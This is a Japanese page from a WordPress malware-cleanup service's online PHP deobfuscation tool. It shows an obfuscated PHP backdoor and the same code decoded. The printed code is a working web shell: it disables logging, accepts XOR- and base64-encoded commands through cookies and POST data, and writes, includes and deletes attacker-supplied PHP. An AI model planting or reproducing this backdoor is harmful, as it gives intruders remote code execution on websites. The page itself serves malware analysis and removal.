Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $embsjrirj = "\146"."\151".chr(108)."\145"."\137"."\x70"."\165"."\164".chr(524-429)."\x63".chr(259-148)."\156".chr(116).chr(101)."\x6e".'t'.chr(115); $volgdpk = "\x62".'a'."\163"."\145"."\x36".chr(776-724).'_'.chr(862-762).'e'.'c'.chr(111)."\x64"."\145"; $xljtxx = "\x69".'n'.'i'.chr(95)."\1...



難読化されたPHPコード

<?php $embsjrirj = "\146"."\151".chr(108)."\145"."\137"."\x70"."\165"."\164".chr(524-429)."\x63".chr(259-148)."\156".chr(116).chr(101)."\x6e".'t'.chr(115);
$volgdpk = "\x62".'a'."\163"."\145"."\x36".chr(776-724).'_'.chr(862-762).'e'.'c'.chr(111)."\x64"."\145";
$xljtxx = "\x69".'n'.'i'.chr(95)."\163"."\x65"."\164";
$vmolhgtq = chr(117)."\156".'l'.chr(945-840).chr(110).chr(107);


@$xljtxx("\x65".'r'."\x72".'o'.chr(114).chr(347-252)."\x6c"."\x6f".'g', NULL);
@$xljtxx(chr(108).'o'."\x67"."\137".chr(101).'r'."\x72"."\x6f".chr(114).'s', 0);
@$xljtxx(chr(884-775)."\x61".'x'."\137".chr(101)."\x78".'e'.chr(466-367).'u'.'t'.'i'."\x6f"."\x6e"."\137"."\x74"."\x69"."\155"."\x65", 0);
@set_time_limit(0);

function ycssfti($wtqzsnk, $eijegdzoak)
{
    $zpoloepgv = "";
    for ($vkpcqvgjky = 0; $vkpcqvgjky < strlen($wtqzsnk);) {
        for ($j = 0; $j < strlen($eijegdzoak) && $vkpcqvgjky < strlen($wtqzsnk); $j++, $vkpcqvgjky++) {
            $zpoloepgv .= chr(ord($wtqzsnk[$vkpcqvgjky]) ^ ord($eijegdzoak[$j]));
        }
    }
    return $zpoloepgv;
}

$umhfny = array_merge($_COOKIE, $_POST);
$qgijtneiep = '8ce9e583-5756-4755-841a-0af5fb31c3c7';
foreach ($umhfny as $wnkdjr => $wtqzsnk) {
    $wtqzsnk = @unserialize(ycssfti(ycssfti($volgdpk($wtqzsnk), $qgijtneiep), $wnkdjr));
    if (isset($wtqzsnk[chr(938-841).'k'])) {
        if ($wtqzsnk["\x61"] == chr(105)) {
            $vkpcqvgjky = array(
                chr(112)."\x76" => @phpversion(),
                chr(854-739)."\x76" => "3.5",
            );
            echo @serialize($vkpcqvgjky);
        } elseif ($wtqzsnk["\x61"] == chr(101)) {
            $btxynzwrr = "./" . md5($qgijtneiep) . "\56"."\x69"."\156".chr(99);
            @$embsjrirj($btxynzwrr, "<" . "\x3f"."\160"."\150".chr(112)."\x20".chr(860-796).chr(490-373).'n'.chr(108)."\x69".chr(914-804).chr(107).chr(774-734)."\x5f".chr(963-868)."\106".chr(722-649)."\x4c".chr(275-206).'_'."\x5f".')'.chr(59).chr(238-206) . $wtqzsnk[chr(485-385)]);
            @include($btxynzwrr);
            @$vmolhgtq($btxynzwrr);
        }
        exit();
    }
}

デコード(難読化解除)されたコード

<?php

$embsjrirj = "file_put_contents";
$volgdpk = "base64_decode";
$xljtxx = "ini_set";
$vmolhgtq = "unlink";
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
function ycssfti($wtqzsnk, $eijegdzoak)
{
    $zpoloepgv = "";
    for ($vkpcqvgjky = 0; $vkpcqvgjky < strlen($wtqzsnk);) {
        for ($j = 0; $j < strlen($eijegdzoak) && $vkpcqvgjky < strlen($wtqzsnk); $j++, $vkpcqvgjky++) {
            $zpoloepgv .= chr(ord($wtqzsnk[$vkpcqvgjky]) ^ ord($eijegdzoak[$j]));
        }
    }
    return $zpoloepgv;
}
$umhfny = array_merge($_COOKIE, $_POST);
$qgijtneiep = '8ce9e583-5756-4755-841a-0af5fb31c3c7';
foreach ($umhfny as $wnkdjr => $wtqzsnk) {
    $wtqzsnk = @unserialize(ycssfti(ycssfti($volgdpk($wtqzsnk), $qgijtneiep), $wnkdjr));
    if (isset($wtqzsnk["ak"])) {
        if ($wtqzsnk["a"] == "i") {
            $vkpcqvgjky = array("pv" => @phpversion(), "sv" => "3.5");
            echo @serialize($vkpcqvgjky);
        } elseif ($wtqzsnk["a"] == "e") {
            $btxynzwrr = "./" . md5($qgijtneiep) . "." . "i" . "n" . "c";
            @$embsjrirj($btxynzwrr, "<?php @unlink(__FILE__); " . $wtqzsnk["d"]);
            @(include $btxynzwrr);
            @$vmolhgtq($btxynzwrr);
        }
        exit;
    }
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.